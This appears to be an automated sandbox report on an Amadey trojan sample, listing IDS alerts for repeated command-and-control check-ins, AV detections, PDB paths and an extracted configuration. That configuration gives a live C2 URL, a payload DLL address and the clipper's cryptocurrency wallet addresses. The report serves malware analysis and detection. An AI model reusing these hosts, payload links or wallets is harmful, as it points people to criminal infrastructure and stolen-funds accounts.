                            Timestamp:192.168.2.362.204.41.449888802027700 02/08/23-21:32:07.875066
                            SID:2027700
                            Source Port:49888
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449717802027700 02/08/23-21:31:14.890076
                            SID:2027700
                            Source Port:49717
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449799802027700 02/08/23-21:31:43.671152
                            SID:2027700
                            Source Port:49799
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449742802027700 02/08/23-21:31:26.717821
                            SID:2027700
                            Source Port:49742
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449831802027700 02/08/23-21:31:51.495547
                            SID:2027700
                            Source Port:49831
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449825802027700 02/08/23-21:31:50.017874
                            SID:2027700
                            Source Port:49825
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449949802027700 02/08/23-21:32:25.497713
                            SID:2027700
                            Source Port:49949
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449920802027700 02/08/23-21:32:18.281072
                            SID:2027700
                            Source Port:49920
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449955802027700 02/08/23-21:32:27.359900
                            SID:2027700
                            Source Port:49955
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449701802027700 02/08/23-21:31:09.596330
                            SID:2027700
                            Source Port:49701
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449914802027700 02/08/23-21:32:16.837700
                            SID:2027700
                            Source Port:49914
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449866802027700 02/08/23-21:32:02.560496
                            SID:2027700
                            Source Port:49866
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449736802027700 02/08/23-21:31:25.096773
                            SID:2027700
                            Source Port:49736
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449908802027700 02/08/23-21:32:14.246091
                            SID:2027700
                            Source Port:49908
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449777802027700 02/08/23-21:31:38.278119
                            SID:2027700
                            Source Port:49777
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449819802027700 02/08/23-21:31:48.579157
                            SID:2027700
                            Source Port:49819
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449796802027700 02/08/23-21:31:42.929791
                            SID:2027700
                            Source Port:49796
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449761802027700 02/08/23-21:31:31.280569
                            SID:2027700
                            Source Port:49761
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449891802027700 02/08/23-21:32:08.577608
                            SID:2027700
                            Source Port:49891
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449885802027700 02/08/23-21:32:07.169004
                            SID:2027700
                            Source Port:49885
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449720802027700 02/08/23-21:31:17.276374
                            SID:2027700
                            Source Port:49720
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.362.204.41.449850802027700 02/08/23-21:31:58.686515
                            SID:2027700
                            Source Port:49850
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dllURL Reputation: Label: malware
                            Source: 62.204.41.4/Gol478Ns/index.phpURL Reputation: Label: malware
                            Source: http://62.204.41.4/Gol478Ns/index.phpURL Reputation: Label: malware
                            Source: file.exeReversingLabs: Detection: 66%
                            Source: file.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeJoe Sandbox ML: detected
                            Source: 0.3.file.exe.4bb4820.0.raw.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                            Source: 28.2.rundll32.exe.6f690000.0.unpackMalware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_011D2F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F82F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00F82F1D

                            Compliance

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeUnpacked PE file: 2.2.amMl.exe.400000.0.unpack
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: AC:\jir\banilukulivuj\lagite48_xag84\kukafed\varawayaseyu\36-h.pdb source: bmMg.exe, 00000001.00000003.262109812.0000000004742000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000000.262316550.0000000000401000.00000020.00000001.01000000.00000005.sdmp, amMl.exe.1.dr
                            Source: Binary string: wextract.pdb source: file.exe, bmMg.exe.0.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.261534340.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.261384983.0000000004B55000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000F.00000000.400800832.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000F.00000003.401064354.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 00000010.00000002.785330986.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000010.00000000.402691693.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001B.00000000.409509080.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001B.00000002.410333613.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000000.518871560.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000002.519216462.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000023.00000000.645436147.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000023.00000002.646132951.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000024.00000000.774022466.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000024.00000002.774254315.000000000085E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe.15.dr, xriv.exe.0.dr
                            Source: Binary string: Healer.pdb source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367466670.00000000025B0000.00000004.08000000.00040000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wextract.pdbGCTL source: file.exe, bmMg.exe.0.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bmMg.exe, 00000001.00000003.262236025.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, bmMg.exe, 00000001.00000003.262206496.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, bmMg.exe, 00000001.00000003.262109812.000000000479D000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 0000000E.00000000.368083215.0000000000A02000.00000002.00000001.01000000.00000009.sdmp, nika.exe.1.dr
                            Source: Binary string: _.pdb source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\jir\banilukulivuj\lagite48_xag84\kukafed\varawayaseyu\36-h.pdb source: bmMg.exe, 00000001.00000003.262109812.0000000004742000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000000.262316550.0000000000401000.00000020.00000001.01000000.00000005.sdmp, amMl.exe.1.dr
                            Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000010.00000002.785793369.000000000117F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000002.785642751.000000006F69F000.00000002.00000001.01000000.0000000D.sdmp, clip64.dll.16.dr, clip64[1].dll.16.dr
                            Source: Binary string: Healer.pdbH5 source: amMl.exe, 00000002.00000002.367490404.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367466670.00000000025B0000.00000004.08000000.00040000.00000000.sdmp, amMl.exe, 00000002.00000002.367279348.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, amMl.exe, 00000002.00000002.367376734.0000000002350000.00000004.08000000.00040000.00000000.sdmp
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_011D2390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F82390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011EFC58 FindFirstFileExW,15_2_011EFC58

                            Networking

                            barindex
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49701 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49703 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49704 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49705 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49706 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49707 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49708 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49709 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49710 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49711 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49712 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49713 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49714 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49715 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49716 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49717 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49718 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49719 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49720 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49721 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49722 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49724 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49725 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49726 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49727 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49728 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49729 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49730 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49731 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49732 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49733 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49734 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49735 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49736 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49737 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49738 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49739 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49740 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49741 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49742 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49743 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49744 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49745 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49746 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49747 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49748 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49749 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49750 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49751 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49752 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49753 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49754 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49755 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49756 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49757 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49758 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49759 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49760 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49761 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49762 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49763 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49764 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49765 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49766 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49767 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49768 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49769 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49770 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49771 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49772 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49773 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49774 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49775 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49776 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49777 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49778 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49779 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49780 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49781 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49782 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49783 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49784 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49785 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49786 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49787 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49788 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49789 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49790 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49791 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49792 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49793 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49794 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49795 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49796 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49797 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49798 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49799 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49800 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49801 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49802 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49803 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49804 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49805 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49806 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49807 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49808 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49809 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49810 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49811 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49812 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49813 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49814 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49815 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49816 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49817 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49818 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49819 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49820 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49821 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49822 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49823 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49824 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49825 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49826 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49827 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49828 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49829 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49830 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49831 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49832 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49833 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49834 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49835 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49836 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49837 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49838 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49839 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49840 -> 62.204.41.4:80
